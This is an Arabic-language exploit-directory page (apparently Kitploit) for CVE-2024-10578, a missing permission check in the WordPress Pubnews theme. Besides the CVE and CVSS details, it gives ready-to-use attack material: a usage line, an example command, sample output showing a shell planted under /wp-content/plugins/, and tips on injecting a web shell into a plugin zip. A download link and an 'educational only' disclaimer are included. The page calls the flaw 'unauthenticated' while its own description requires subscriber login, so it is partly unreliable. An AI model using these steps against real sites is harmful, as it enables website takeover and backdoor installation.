Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-10578 — Pubnews <= 1.0.7 - تثبيت إضافات تعسفي دون مصادقة | Kitploit
أدوات/GitHubGitHub/nxploited/cve-2024-10578
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمتطوير الحمولات
GitHubnxploited/cve-2024-10578

CVE-2024-10578

Pubnews <= 1.0.7 - تثبيت إضافات تعسفي دون مصادقة

عرض المستودع
1منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-10578: Pubnews <= 1.0.7 - تثبيت إضافات تعسفي دون مصادقة

الوصف

ثيم Pubnews في ووردبريس معرّض لثغرة تثبيت إضافات تعسفي غير مصرّح به بسبب غياب فحص الصلاحيات في الدالة pubnews_importer_plugin_action_for_notice() في جميع الإصدارات حتى 1.0.7 وما يشملها. تسمح هذه الثغرة للمهاجمين المصادقين بصلاحية مستوى المشترك (Subscriber) وما فوق بتثبيت إضافات تعسفية يمكن استغلالها لاستهداف ثغرات أخرى.

CWE

  • CWE-434: رفع ملف بدون قيود بنوع خطير

CVSS

  • النتيجة: 8.8 (عالية)
  • الإصدار: 3.1
  • سلسلة المتجه: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

السكربت الاستغلالي: wordpress_exploit.py

يستغل هذا السكربت الثغرة في ثيم Pubnews لتثبيت إضافة تعسفية من رابط معيّن. يمكن أن تحتوي الإضافة على شيل خبيث أو أي حمولة أخرى.

الاستخدام

root@kitploit:~

CVE-2024-10578.py [-h] -u URL -un USERNAME -p PASSWORD -url_zip PLUGIN_URL

Pubnews <= 1.0.7 - Unauthenticated Arbitrary Plugin Installation # By Nxploited, Khaled alenazi

options:
  -h, --help            show this help message and exit
  -u, --url URL         The URL of the WordPress site
  -un, --username USERNAME
                        The username for WordPress login
  -p, --password PASSWORD
                        The password for WordPress login
  -url_zip, --plugin_url PLUGIN_URL
                        The plugin URL to install (must be a zip file with the shell injected inside)

مثال

root@kitploit:~
python 
CVE-2024-10578.py -u http://target/wordpress -un admin -p admin -url_zip http://target/shell1.zip

المخرجات

root@kitploit:~
[+] Logged in successfully.
[+] Admin _wpnonce extracted: 6bf22371ab
[+] Plugin installed successfully.
[+] Plugin extracted. You can find the shell here: /wp-content/plugins/shell1/

ملاحظات مهمة

  • يجب أن يكون رابط الإضافة رابطًا مباشرًا لملف zip يحتوي على الشيل أو أي حمولة أخرى.
  • يُنصح باستخدام أي إضافة ووردبريس موجودة، وحقن الشيل بداخلها، ثم ضغطها مرة أخرى بصيغة zip. ارفع ملف zip هذا إلى رابط مباشر لاستغلاله.

⚠️ إخلاء مسؤولية

هذا السكربت مخصص للأغراض التعليمية فقط. لا يقرّ المؤلف استخدام هذا السكربت في أنشطة غير قانونية. استخدمه بمسؤولية وفقط على الأنظمة التي لديك إذن صريح لاختبارها.

بواسطة: Nxploited | Khaled Alenazi

تنزيل الأداة